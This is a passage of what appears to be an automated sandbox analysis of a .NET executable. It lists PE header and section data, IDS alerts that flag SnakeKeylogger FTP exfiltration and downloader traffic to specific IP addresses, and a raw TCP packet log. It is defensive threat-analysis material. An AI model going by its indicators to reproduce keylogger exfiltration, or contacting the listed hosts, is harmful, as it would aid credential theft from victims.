add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc536b	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc6000	0x2484	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xca000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc3f38	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc33c4	0xc3800	9455e9fd9bc05992df21fc7f05987c07	False	0.88461202245844	data	7.773152694651227	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc6000	0x2484	0x2800	8ad660509442e96069c4de90c708dc65	False	0.84150390625	data	7.2452124368752955	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xca000	0xc	0x800	31d96f8b9a2e917fb2f7ff5b3074f010	False	0.015625	data	0.02939680787012526	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc60c8	0x2028	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9876093294460642
RT_GROUP_ICON	0xc8100	0x14	data	1.05
RT_VERSION	0xc8124	0x35c	data	0.413953488372093

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-30T15:03:01.894291+0200	2845532	ETPRO MALWARE SnakeKeylogger Exfil via FTP M1	1	192.168.2.4	49780	45.143.99.52	21	TCP
2024-09-30T15:03:06.041175+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49734	132.226.8.169	80	TCP
2024-09-30T15:03:08.055931+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49734	132.226.8.169	80	TCP
2024-09-30T15:03:08.573740+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49737	188.114.97.3	443	TCP
2024-09-30T15:03:10.479342+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49738	132.226.8.169	80	TCP
2024-09-30T15:03:11.053405+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49739	188.114.97.3	443	TCP
2024-09-30T15:03:12.914997+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49742	188.114.97.3	443	TCP
2024-09-30T15:03:13.352929+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49741	132.226.8.169	80	TCP
2024-09-30T15:03:14.482581+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49745	188.114.97.3	443	TCP
2024-09-30T15:03:16.259049+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49741	132.226.8.169	80	TCP
2024-09-30T15:03:17.150964+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49752	188.114.97.3	443	TCP
2024-09-30T15:03:17.408082+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49753	188.114.97.3	443	TCP
2024-09-30T15:03:20.196573+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49755	132.226.8.169	80	TCP
2024-09-30T15:03:24.274728+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49759	132.226.8.169	80	TCP
2024-09-30T15:03:25.987378+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49763	188.114.97.3	443	TCP
2024-09-30T15:03:28.112386+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49765	188.114.97.3	443	TCP
2024-09-30T15:03:28.824855+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49766	188.114.97.3	443	TCP
2024-09-30T15:03:38.813708+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49774	188.114.97.3	443	TCP
2024-09-30T15:03:40.638151+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49776	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 15:03:03.605104923 CEST	49734	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:03.610596895 CEST	80	49734	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:03.610676050 CEST	49734	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:03.610894918 CEST	49734	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:03.615886927 CEST	80	49734	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:05.617753029 CEST	80	49734	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:05.623363972 CEST	49734	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:05.628303051 CEST	80	49734	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:05.914757013 CEST	80	49734	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:05.997776985 CEST	49736	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:05.997869968 CEST	443	49736	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:05.997972012 CEST	49736	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:06.006000042 CEST	49736	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:06.006035089 CEST	443	49736	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:06.041174889 CEST	49734	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:06.476068974 CEST	443	49736	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:06.476145029 CEST	49736	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:06.481218100 CEST	49736	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:06.481242895 CEST	443	49736	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:06.481561899 CEST	443	49736	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:06.524674892 CEST	49736	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:06.531718969 CEST	49736	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:06.575443983 CEST	443	49736	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:06.640223026 CEST	443	49736	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:06.640290976 CEST	443	49736	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:06.640472889 CEST	49736	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:06.645972013 CEST	49736	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:06.649216890 CEST	49734	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:06.654124975 CEST	80	49734	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:07.936012030 CEST	80	49734	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:07.939158916 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:07.939201117 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:07.939364910 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:07.939913034 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:07.939935923 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:08.055931091 CEST	49734	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:08.412504911 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:08.417306900 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:08.417329073 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:08.573729992 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:08.573798895 CEST	443	49737	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:08.574034929 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:08.577151060 CEST	49737	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:08.579109907 CEST	49734	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:08.581409931 CEST	49738	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:08.584353924 CEST	80	49734	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:08.584563971 CEST	49734	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:08.586250067 CEST	80	49738	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:08.586512089 CEST	49738	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:08.586637020 CEST	49738	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:08.591392994 CEST	80	49738	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:10.431041956 CEST	80	49738	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:10.438731909 CEST	49739	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:10.438834906 CEST	443	49739	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:10.438942909 CEST	49739	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:10.442131996 CEST	49739	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:10.442167997 CEST	443	49739	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:10.479341984 CEST	49738	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:10.900489092 CEST	443	49739	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:10.902487040 CEST	49739	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:10.902540922 CEST	443	49739	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:11.053406954 CEST	443	49739	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:11.053497076 CEST	443	49739	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:11.053548098 CEST	49739	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:11.053864956 CEST	49739	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:11.057167053 CEST	49740	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:11.059449911 CEST	49741	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:11.061975956 CEST	80	49740	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:11.062149048 CEST	49740	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:11.062177896 CEST	49740	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:11.064327955 CEST	80	49741	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:11.064393044 CEST	49741	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:11.064553976 CEST	49741	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:11.067001104 CEST	80	49740	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:11.069344997 CEST	80	49741	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:12.001118898 CEST	80	49741	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:12.005088091 CEST	49741	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:12.010067940 CEST	80	49741	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:12.264158010 CEST	80	49740	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:12.272716999 CEST	49742	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:12.272778034 CEST	443	49742	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:12.272866964 CEST	49742	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:12.273143053 CEST	49742	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:12.273159981 CEST	443	49742	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:12.305951118 CEST	49740	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:12.757785082 CEST	443	49742	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:12.759995937 CEST	49742	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:12.760020971 CEST	443	49742	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:12.914974928 CEST	443	49742	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:12.915054083 CEST	443	49742	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:12.915168047 CEST	49742	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:12.917529106 CEST	49742	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:12.924117088 CEST	49740	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:12.926160097 CEST	49743	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:12.929466009 CEST	80	49740	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:12.929591894 CEST	49740	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:12.930968046 CEST	80	49743	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:12.931039095 CEST	49743	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:12.931226969 CEST	49743	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:12.935966969 CEST	80	49743	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:13.303366899 CEST	80	49741	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:13.352929115 CEST	49741	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:13.785640001 CEST	49744	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:13.785681009 CEST	443	49744	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:13.785761118 CEST	49744	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:13.796022892 CEST	49744	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:13.796041012 CEST	443	49744	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:13.845216990 CEST	80	49743	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:13.846455097 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:13.846506119 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:13.846585989 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:13.846790075 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:13.846806049 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:13.899698973 CEST	49743	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:14.274799109 CEST	443	49744	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:14.274878025 CEST	49744	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:14.277059078 CEST	49744	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:14.277065039 CEST	443	49744	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:14.277326107 CEST	443	49744	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:14.321563005 CEST	49744	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:14.328485966 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:14.329812050 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:14.329837084 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:14.333494902 CEST	49744	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:14.375406027 CEST	443	49744	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:14.448728085 CEST	443	49744	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:14.448796988 CEST	443	49744	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:14.448843002 CEST	49744	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:14.482655048 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:14.482873917 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:14.482932091 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:14.483344078 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:14.489445925 CEST	49743	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:14.489850998 CEST	49744	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:14.491092920 CEST	49747	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:14.494507074 CEST	80	49743	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:14.494626045 CEST	49743	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:14.494669914 CEST	49741	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:14.497306108 CEST	80	49747	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:14.497381926 CEST	49747	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:14.497517109 CEST	49747	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:14.499492884 CEST	80	49741	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:14.502305031 CEST	80	49747	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:16.208565950 CEST	80	49741	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:16.259048939 CEST	49741	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:16.270647049 CEST	49752	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:16.270685911 CEST	443	49752	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:16.270746946 CEST	49752	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:16.274286032 CEST	49752	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:16.274302006 CEST	443	49752	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:16.759396076 CEST	443	49752	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:16.800672054 CEST	80	49747	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:16.801812887 CEST	49753	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:16.801856995 CEST	443	49753	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:16.801933050 CEST	49753	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:16.802227020 CEST	49753	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:16.802241087 CEST	443	49753	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:16.805912018 CEST	49752	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:16.852797985 CEST	49747	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:17.034744024 CEST	49752	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:17.034759998 CEST	443	49752	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:17.150980949 CEST	443	49752	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:17.151055098 CEST	443	49752	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:17.151127100 CEST	49752	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:17.151613951 CEST	49752	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:17.154633999 CEST	49741	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:17.155554056 CEST	49755	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:17.159816027 CEST	80	49741	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:17.160337925 CEST	80	49755	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:17.160425901 CEST	49741	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:17.160470009 CEST	49755	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:17.160518885 CEST	49755	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:17.165216923 CEST	80	49755	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:17.274993896 CEST	443	49753	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:17.285339117 CEST	49753	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:17.285367966 CEST	443	49753	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:17.408200026 CEST	443	49753	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:17.408463955 CEST	443	49753	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:17.408586025 CEST	49753	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:17.408927917 CEST	49753	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:17.412256956 CEST	49747	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:17.413548946 CEST	49756	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:17.417306900 CEST	80	49747	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:17.417366982 CEST	49747	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:17.418303013 CEST	80	49756	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:17.418373108 CEST	49756	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:17.418443918 CEST	49756	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:17.423135042 CEST	80	49756	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:20.142450094 CEST	80	49755	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:20.144246101 CEST	49757	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:20.144351959 CEST	443	49757	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:20.144484997 CEST	49757	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:20.144938946 CEST	49757	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:20.144968987 CEST	443	49757	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:20.196573019 CEST	49755	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:20.620522976 CEST	443	49757	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:20.637419939 CEST	49757	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:20.637475967 CEST	443	49757	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:20.679902077 CEST	80	49756	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:20.681453943 CEST	49758	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:20.681513071 CEST	443	49758	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:20.681593895 CEST	49758	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:20.681819916 CEST	49758	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:20.681847095 CEST	443	49758	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:20.727920055 CEST	49756	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:20.768946886 CEST	443	49757	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:20.769068956 CEST	443	49757	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:20.769139051 CEST	49757	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:20.769531012 CEST	49757	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:20.772475958 CEST	49755	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:20.773596048 CEST	49759	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:20.777623892 CEST	80	49755	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:20.777697086 CEST	49755	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:20.778548002 CEST	80	49759	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:20.778613091 CEST	49759	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:20.778690100 CEST	49759	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:20.784143925 CEST	80	49759	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:21.144295931 CEST	443	49758	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:21.154117107 CEST	49758	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:21.154172897 CEST	443	49758	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:21.268857956 CEST	443	49758	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:21.269120932 CEST	443	49758	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:21.269192934 CEST	49758	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:21.269458055 CEST	49758	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:21.272243023 CEST	49756	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:21.273211002 CEST	49760	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:21.277394056 CEST	80	49756	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:21.277452946 CEST	49756	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:21.278069973 CEST	80	49760	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:21.278130054 CEST	49760	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:21.278218031 CEST	49760	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:21.282912970 CEST	80	49760	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:24.221577883 CEST	80	49759	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:24.223360062 CEST	49761	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:24.223486900 CEST	443	49761	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:24.223611116 CEST	49761	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:24.224005938 CEST	49761	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:24.224042892 CEST	443	49761	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:24.274728060 CEST	49759	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:24.686182022 CEST	443	49761	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:24.688103914 CEST	49761	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:24.688169003 CEST	443	49761	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:24.850820065 CEST	443	49761	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:24.850949049 CEST	443	49761	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:24.851027966 CEST	49761	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:24.851516962 CEST	49761	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:24.859719038 CEST	49762	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:24.864566088 CEST	80	49762	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:24.864650965 CEST	49762	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:24.864725113 CEST	49762	80	192.168.2.4	132.226.8.169
Sep 30, 2024 15:03:24.869568110 CEST	80	49762	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:25.340111017 CEST	80	49760	132.226.8.169	192.168.2.4
Sep 30, 2024 15:03:25.341710091 CEST	49763	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:25.341734886 CEST	443	49763	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:25.341819048 CEST	49763	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:25.342083931 CEST	49763	443	192.168.2.4	188.114.97.3
Sep 30, 2024 15:03:25.342098951 CEST	443	49763	188.114.97.3	192.168.2.4
Sep 30, 2024 15:03:25.384167910 CEST	49760	80	192.168.2.4	132.226.8.169
